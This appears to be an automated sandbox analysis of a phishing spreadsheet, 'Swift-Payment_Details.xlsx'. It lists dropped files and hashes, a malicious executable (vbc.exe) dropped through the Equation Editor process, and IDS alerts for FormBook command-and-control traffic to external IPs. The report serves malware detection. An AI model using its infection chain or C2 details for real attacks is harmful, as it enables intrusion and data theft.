                                                                                                                                                          Preview: .PNG........IHDR...0...(.....9.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....e.z...b.$..P ..^.Jd..8.........c..c..mF.&......F...[....Zk...>.g....{...U.T.S.'.O......eS`S`S`S`S`S`S`S..Q.{....._...?...g7.6.6.6.6.6.6.6......$......................!..c.?.).).).).).)..).=...+.....................}................x.....O.M.M.M.M.M.M.M..M...>....o.l.l.l.l.l..z.l@...&.................@.....C................+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1........................]............x....e..n............+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1..................?.....b..o.l.l.l.l.l.l.|`.l@...`.~S`S`S`S`S`S`S`..=.6.6.6.6.6.6.6.>0.6 ....?.).).).).).).).......................}..................l.M.M.M.M.M.M.M..L...>....o.l.l.l.l.l.l.l@.....................d.x...7.6.6.6.6.6.6.6 .s`S`S`S`S`S`S`S..S`...<...
                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8300874A.png
                                                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                          File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):11303
                                                                                                                                                          Entropy (8bit):7.909402464702408
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                                                                                                                                          MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                                                                                                                                          SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                                                                                                                                          SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                                                                                                                                          SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CBC9332D.jpeg
                                                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                          File Type:[TIFF image data, big-endian, direntries=4], baseline, precision 8, 654x513, frames 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):62140
                                                                                                                                                          Entropy (8bit):7.529847875703774
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:S30U+TLdCuTO/G6VepVUxKHu9CongJvJsg:vCTbVKVzHu9ConWvJF
                                                                                                                                                          MD5:722C1BE1697CFCEAE7BDEFB463265578
                                                                                                                                                          SHA1:7D300A2BAB951B475477FAA308E4160C67AD93A9
                                                                                                                                                          SHA-256:2EE4908690748F50B261A796E6932FBCA10A79D83C316A9CEE92726CA4453DAE
                                                                                                                                                          SHA-512:2F38E0581397025674FA40B20E73B32D26F43851BE9A8DFA0B1655795CDC476A5171249D1D8D383693775ED9F132FA6BB56D92A8949191738AF05DA053C4E561
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview: ......JFIF.....`.`......Exif..MM.*.......;.........J.i.........R.......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D2ACE7B2.emf
                                                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):648132
                                                                                                                                                          Entropy (8bit):2.8123650159483695
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:m34UL0tS6WB0JOqFB5AEA7rgXuzqn8nG/qc+5:I4UcLe0JOcXuunhqcS
                                                                                                                                                          MD5:3B90792776F3D826839423A2699535EB
                                                                                                                                                          SHA1:C3D3837C5467537BDF6D41539E80D2CBDFD05B57
                                                                                                                                                          SHA-256:C1E498EC3C599E0A0CEE1FBE3D3591517740DED57D7E3171E3C8175F7890C373
                                                                                                                                                          SHA-512:1547E503080B35E6A61F8457E87A0F86202926B9DE5B2873D045A4E3EA944681497E6FB671F96D51D51887B6BDD459B46EE6AC57E4B57379CE14B0C054C0006D
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview: ....l...........................m>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................x$...4.S.-z.x.@..%.....S.T.S.......S.8.S..N[P..S...S..... .S...S..N[P..S...S. ....y.x..S...S. ............z.x........................................%...X...%...7...................{$..................C.a.l.i.b.r.i...........D.S.X.....S...S............vdv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E4725290.jpeg
                                                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):85020
                                                                                                                                                          Entropy (8bit):7.2472785111025875
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                                                                                                                                                          MD5:738BDB90A9D8929A5FB2D06775F3336F
                                                                                                                                                          SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                                                                                                                                                          SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                                                                                                                                                          SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E4BDA71E.png
                                                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                          File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):11303
                                                                                                                                                          Entropy (8bit):7.909402464702408
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                                                                                                                                          MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                                                                                                                                          SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                                                                                                                                          SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                                                                                                                                          SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
                                                                                                                                                          C:\Users\user\Desktop\~$Swift-Payment_Details.xlsx
                                                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):330
                                                                                                                                                          Entropy (8bit):1.4377382811115937
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                                                                                          MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                                                                                          SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                                                                                          SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                                                                                          SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                          C:\Users\Public\vbc.exe
                                                                                                                                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):188889
                                                                                                                                                          Entropy (8bit):7.939883976403979
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:TwjHmsbeuEz5qDDOapMygfwt3AA4fce6/1DQj5U+FS8EoESO:TwjHFrtYwxAAMu/1cj51FSDdSO
                                                                                                                                                          MD5:57F3AE2842FFB5CEEA386D0B97A52818
                                                                                                                                                          SHA1:68423398D025D3CBBB944EE4C3CEA5501DF67761
                                                                                                                                                          SHA-256:A0C7B3D44A5CFCDA917FC80C099DA5AB3DE582FF7C24F1373B4BD25F88D61E52
                                                                                                                                                          SHA-512:F398186C2F5ADB9726AAC3AEAD8289ABC9288404B4B39DBABC66494A77B0160CA560CF52C9F76B15B34619F150F516A74DB96DB967F75942F3C9F325C5DA4A81
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......l..{(dl((dl((dl(.{g()dl(.xb( dl(.{f(?dl(!..(#dl((dm(.dl(!..()dl(!..()dl(Rich(dl(........................PE..L....~.`.................6..........Z .......P....@..........................p..............................................0T..x....................................................................................P...............................text....4.......6.................. ..`.rdata..d....P.......:..............@..@.data........`.......D..............@...................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          Static File Info

                                                                                                                                                          General

                                                                                                                                                          File type:CDFV2 Encrypted
                                                                                                                                                          Entropy (8bit):7.994796496723682
                                                                                                                                                          TrID:
                                                                                                                                                          • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                                                                                                          File name:Swift-Payment_Details.xlsx
                                                                                                                                                          File size:1326080
                                                                                                                                                          MD5:975a4017075c97740e54740fc8d24f77
                                                                                                                                                          SHA1:0a483229a6fa9a61575bcdd3068a5707d17034c5
                                                                                                                                                          SHA256:01d8b4b3103b1ecee2ced7a9437bc2c512918199ed9238040b775ee7196e8ede
                                                                                                                                                          SHA512:9f7fc6380f8bc90611f0c7fdade84a6d1299de6566d6dd850b1cbaf87b9afdc3eda397773c46b0216368e95838ba0397cd23dcc4f8517bf270584e15cbc6a44b
                                                                                                                                                          SSDEEP:24576:o2fw17LGeaqT49SbLoW6j1qiF35O3sVzkEohNyJrXz6Q/fWrpqWnnQIEb:16aqT46aq65usO4n6wWkWnU
                                                                                                                                                          File Content Preview:........................>.......................................................................................................|.......~...............z......................................................................................................

                                                                                                                                                          File Icon

                                                                                                                                                          Icon Hash:e4e2aa8aa4b4bcb4

                                                                                                                                                          Static OLE Info

                                                                                                                                                          General

                                                                                                                                                          Document Type:OLE
                                                                                                                                                          Number of OLE Files:1

                                                                                                                                                          OLE File "Swift-Payment_Details.xlsx"

                                                                                                                                                          Indicators

                                                                                                                                                          Has Summary Info:False
                                                                                                                                                          Application Name:unknown
                                                                                                                                                          Encrypted Document:True
                                                                                                                                                          Contains Word Document Stream:False
                                                                                                                                                          Contains Workbook/Book Stream:False
                                                                                                                                                          Contains PowerPoint Document Stream:False
                                                                                                                                                          Contains Visio Document Stream:False
                                                                                                                                                          Contains ObjectPool Stream:
                                                                                                                                                          Flash Objects Count:
                                                                                                                                                          Contains VBA Macros:False

                                                                                                                                                          Streams

                                                                                                                                                          Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                                                                                                                                          General
                                                                                                                                                          Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:64
                                                                                                                                                          Entropy:2.73637206947
                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                          Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                                                                                                                                                          Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                                                                                                                                                          Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                                                                                                                                          General
                                                                                                                                                          Stream Path:\x6DataSpaces/DataSpaceMap
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:112
                                                                                                                                                          Entropy:2.7597816111
                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                          Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                                                                                                                                          Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                                                                                                                                                          Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                                                                                                                                                          General
                                                                                                                                                          Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:200
                                                                                                                                                          Entropy:3.13335930328
                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                          Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                          Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                                                                                                                                                          Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                                                                                                                                          General
                                                                                                                                                          Stream Path:\x6DataSpaces/Version
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:76
                                                                                                                                                          Entropy:2.79079600998
                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                          Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                                                                                                                                                          Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                                                                                                                                                          Stream Path: EncryptedPackage, File Type: data, Stream Size: 1311336
                                                                                                                                                          General
                                                                                                                                                          Stream Path:EncryptedPackage
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:1311336
                                                                                                                                                          Entropy:7.99889031885
                                                                                                                                                          Base64 Encoded:True
                                                                                                                                                          Data ASCII:` . . . . . . . . : . y T = . < l . . . . . . ' $ t T . } . . ] a - ) 6 . . . . . . . . . . . o . . . . f . N 8 2 . . . y . q . . 2 . . . . h ` G . . . . . . . i . h . . . . . G . . . . . . . i . h . . . . . G . . . . . . . i . h . . . . . G . . . . . . . i . h . . . . . G . . . . . . . i . h . . . . . G . . . . . . . i . h . . . . . G . . . . . . . i . h . . . . . G . . . . . . . i . h . . . . . G . . . . . . . i . h . . . . . G . . . . . . . i . h . . . . . G . . . . . . . i . h . . . . . G . . . . . . .
                                                                                                                                                          Data Raw:60 02 14 00 00 00 00 00 bd 3a c4 79 54 3d cd 3c 6c c0 a8 ef d9 dc f4 27 24 74 54 0c 7d aa c6 5d 61 2d 29 36 01 2e f5 c2 0f 8b e7 b8 ab 92 0f 6f 07 95 96 99 66 ce 4e 38 32 ef 97 85 79 be 71 0a 11 32 ee f5 17 93 68 60 47 2e 06 a4 89 b7 e0 c8 69 f3 68 17 1c a6 d8 aa 47 2e 06 a4 89 b7 e0 c8 69 f3 68 17 1c a6 d8 aa 47 2e 06 a4 89 b7 e0 c8 69 f3 68 17 1c a6 d8 aa 47 2e 06 a4 89 b7 e0 c8
                                                                                                                                                          Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                                                                                                                                          General
                                                                                                                                                          Stream Path:EncryptionInfo
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:224
                                                                                                                                                          Entropy:4.58512236603
                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                          Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . . . p . 1 . . . . . . . . " a . . . . . . . l . f . . . . . . . . . . . 1 w . ' . 2 . . . . . { . H Y L . 0 . . . . Q . | W . . > k
                                                                                                                                                          Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                                                                                                                                                          Network Behavior

                                                                                                                                                          Snort IDS Alerts

                                                                                                                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                          07/22/21-17:23:19.807859TCP2022550ET TROJAN Possible Malicious Macro DL EXE Feb 20164916780192.168.2.22192.210.173.40
                                                                                                                                                          07/22/21-17:24:37.561999TCP2031453ET TROJAN FormBook CnC Checkin (GET)4916880192.168.2.22173.255.194.134
                                                                                                                                                          07/22/21-17:24:37.561999TCP2031449ET TROJAN FormBook CnC Checkin (GET)4916880192.168.2.22173.255.194.134
                                                                                                                                                          07/22/21-17:24:37.561999TCP2031412ET TROJAN FormBook CnC Checkin (GET)4916880192.168.2.22173.255.194.134

                                                                                                                                                          Network Port Distribution

                                                                                                                                                          TCP Packets

                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                          Jul 22, 2021 17:23:19.602353096 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                          Jul 22, 2021 17:23:19.807230949 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:23:19.807353973 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                          Jul 22, 2021 17:23:19.807858944 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                          Jul 22, 2021 17:23:20.009445906 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:23:20.009484053 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:23:20.009505987 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:23:20.009529114 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:23:20.009706020 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                          Jul 22, 2021 17:23:20.208898067 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:23:20.208935976 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:23:20.208956957 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:23:20.208980083 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:23:20.209002018 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:23:20.209022999 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:23:20.209044933 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:23:20.209067106 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:23:20.209196091 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                          Jul 22, 2021 17:23:20.212716103 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                          Jul 22, 2021 17:23:20.408178091 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:23:20.408262014 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:23:20.408409119 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:23:20.408535957 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                          Jul 22, 2021 17:23:20.408560991 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                          Jul 22, 2021 17:23:20.408562899 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:23:20.408565044 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                          Jul 22, 2021 17:23:20.408644915 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:23:20.408644915 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                          Jul 22, 2021 17:23:20.408714056 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:23:20.408719063 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                          Jul 22, 2021 17:23:20.408781052 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:23:20.408782005 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                          Jul 22, 2021 17:23:20.408849955 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                          Jul 22, 2021 17:23:20.408849955 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:23:20.408914089 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:23:20.408922911 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                          Jul 22, 2021 17:23:20.408987045 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:23:20.408988953 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                          Jul 22, 2021 17:23:20.409060001 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                          Jul 22, 2021 17:23:20.411926031 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                          Jul 22, 2021 17:23:20.411957026 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:23:20.411983967 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:23:20.412003994 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:23:20.412020922 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:23:20.412087917 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                          Jul 22, 2021 17:23:20.412102938 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                          Jul 22, 2021 17:23:20.607979059 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:23:20.608028889 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:23:20.608061075 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:23:20.608087063 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:23:20.608113050 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:23:20.608139992 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:23:20.608165979 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:23:20.608197927 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                          Jul 22, 2021 17:23:20.608201027 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:23:20.608242989 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:23:20.608251095 CEST4916780192.168.2.22192.210.173.40
